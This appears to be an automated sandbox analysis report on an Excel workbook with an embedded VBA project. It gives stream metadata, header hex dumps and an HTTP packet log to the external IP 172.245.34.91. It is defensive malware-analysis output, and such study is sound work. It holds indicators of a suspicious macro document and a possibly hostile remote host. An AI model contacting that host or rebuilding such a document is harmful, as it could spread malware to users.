                                              Entropy:3.631242196770981
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF322/MBD017ED236/Package
                                              File Type:Microsoft Excel 2007+
                                              Stream Size:7880
                                              Entropy:6.5489983015138815
                                              Base64 Encoded:True
                                              Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF322/Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:151951
                                              Entropy:7.683500296443008
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:524
                                              Entropy:5.18268582383174
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { E 6 0 3 B E 4 9 - 3 B E 4 - 4 9 D 7 - 9 5 7 C - E 1 6 A B 7 6 4 E 9 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F E F C F 8 9 E 0 8 A 6 A 0 A A A
                                              Data Raw:49 44 3d 22 7b 45 36 30 33 42 45 34 39 2d 33 42 45 34 2d 34 39 44 37 2d 39 35 37 43 2d 45 31 36 41 42 37 36 34 45 39 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:104
                                              Entropy:3.0488640812019017
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:2615
                                              Entropy:3.966034925838034
                                              Base64 Encoded:False
                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 85 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:553
                                              Entropy:6.393413723460345
                                              Base64 Encoded:True
                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc bb 86 65 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                              General
                                              Stream Path:MBD017EF323/\x1CompObj
                                              File Type:data
                                              Stream Size:114
                                              Entropy:4.25248375192737
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF323/\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.889430592781307
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:MBD017EF323/\x5SummaryInformation
                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
                                              Stream Size:120200
                                              Entropy:4.560400140271791
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:MBD017EF323/MBD017ED236/\x1CompObj
                                              File Type:data
                                              Stream Size:99
                                              Entropy:3.631242196770981
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF323/MBD017ED236/Package
                                              File Type:Microsoft Excel 2007+
                                              Stream Size:7880
                                              Entropy:6.5489983015138815
                                              Base64 Encoded:True
                                              Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF323/Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:151951
                                              Entropy:7.6835052184911135
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2022 08:13:05.353737116 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.475182056 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.475337982 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.476435900 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.603394032 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603449106 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603480101 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603504896 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603518009 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.603530884 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603550911 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.603557110 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603560925 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.603580952 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.603585005 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603604078 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.603611946 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603638887 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603666067 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.603737116 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.616553068 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.724899054 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.724945068 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.724972010 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.724997997 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725025892 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725059986 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725080013 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725087881 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725087881 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725099087 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725119114 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725126982 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725126982 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725140095 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725147009 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725158930 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725177050 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725186110 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725204945 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725205898 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725219011 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725231886 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725249052 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725260019 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725286961 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725311995 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725338936 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725342035 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725342035 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725363970 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725342035 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725392103 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.725393057 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725393057 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725429058 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.725440979 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.726560116 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847157955 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847219944 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847260952 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847296000 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847332001 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847367048 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847400904 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847434998 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847464085 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847466946 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847464085 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847500086 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847515106 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847531080 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847532034 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847558975 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847564936 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847580910 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847582102 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847601891 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847629070 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847657919 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847687006 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847687006 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847702980 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847719908 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847731113 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847749949 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847762108 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847774982 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847790003 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847795963 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847807884 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847819090 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847841978 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847865105 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847867012 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847891092 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847896099 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847913027 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847913980 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847929001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847939014 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847946882 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.847964048 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847985983 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.847990036 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848001957 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848010063 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848027945 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848046064 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848064899 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848088026 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848108053 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848109961 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848130941 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848130941 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848148108 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848153114 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848165989 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848182917 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848187923 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848237038 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.848423958 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848448038 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.848512888 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.851108074 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972127914 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972176075 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972203016 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972232103 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972260952 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972290039 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972301006 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972318888 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972332001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972332001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972347975 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972348928 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972378016 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972383976 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972394943 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972407103 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972435951 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972440958 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972457886 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972462893 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972480059 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972522020 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972527981 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972558022 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972588062 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972588062 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972613096 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972615957 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972639084 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972645998 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972661018 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972675085 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.972683907 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.972728014 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973151922 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973184109 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973212004 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973217964 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973236084 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973237038 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973257065 CET4917380192.168.2.22172.245.34.91
